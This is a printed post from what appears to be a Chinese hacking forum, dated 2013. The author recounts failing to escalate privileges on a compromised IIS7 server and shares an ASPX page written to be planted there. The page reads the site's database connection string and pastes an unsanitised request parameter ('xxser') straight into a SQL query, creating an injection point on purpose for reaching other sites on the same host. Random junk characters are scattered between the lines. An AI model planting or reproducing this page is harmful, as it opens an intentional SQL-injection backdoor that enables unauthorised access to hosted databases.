中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
$ U7 }7 ?; T! f: R/ V; W
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
% U7 A9 `1 X( y$ k) ~' P
代码量不多,自己写个拉倒了。烦死了。
2 V: k$ s8 K; t5 D7 q
1 ?8 ^/ p* w7 s i& ?* @4 y" I
- Q; }4 P; \ P( Z- D# ~
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
, W4 [% \# ^9 X' B
<html xmlns="http://www.w3.org/1999/xhtml">
2 I( E5 f- K+ Y5 v
<head runat="server">
8 Q# u: S0 y- m, n0 z O6 H, Q
<title>暗影aspx构造注射专用页面</title>
3 V& b; m9 j! ?& F
</head>
4 {$ M& o3 B Y. G" {
<body>
' Y5 ]. a4 h, x4 l5 N1 ?- ?8 N% R
<form id="form1" runat="server">
! @4 }9 H; k5 f2 Q9 L$ y
<div>
; q& f7 j- V; A% E3 c/ o
<script language="c#" runat="server">
2 p |0 R, U1 w9 V! ?( J! p
3 Z% h+ ]+ F. _# ^/ o8 L3 R
void page_init(object sender, EventArgs e)
% ^$ M% _4 i$ c5 |8 _- W
{
$ X, ?9 f9 b9 J( v
8 U0 J$ L" r2 t) P, ]* c O
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
2 m+ }8 J0 U% U; n u
5 M' Y! J8 ]: w
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
) A; l# u- |6 J4 F: C
conn.Open();
4 R) r6 l/ ?5 L
. U6 J3 ^( H0 q! ?' s2 x& p1 n* P
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
( ?/ K8 p3 i. \( g% R
% S, X* r$ @1 c9 j3 J( n* l
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
- T" Y% O9 U: y3 [
int x = command.ExecuteNonQuery();
5 S) M( c) L$ H8 Y/ Q
Response.Write(i+"\n");
8 t3 A% A5 q4 X* q1 j' O
Response.Write(x);
' K2 o5 l7 Z# S5 i& U; z
conn.Close();
. I8 ]/ w) P( O/ p6 G
}
& b n2 C& u* ~) c' x4 H! R& M$ Z
* L# G' G: p; Z2 C. q, O; W
</script>
+ h4 f. y9 E1 R2 S, m
</div>
3 n X7 x. J% n, @( L) a
</form>
2 O+ S' `5 v1 L0 ]* H2 M! k- m; W: J
</body>
; q1 j! H& P& j3 P
</html>
" O: b# `, R, J; o
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2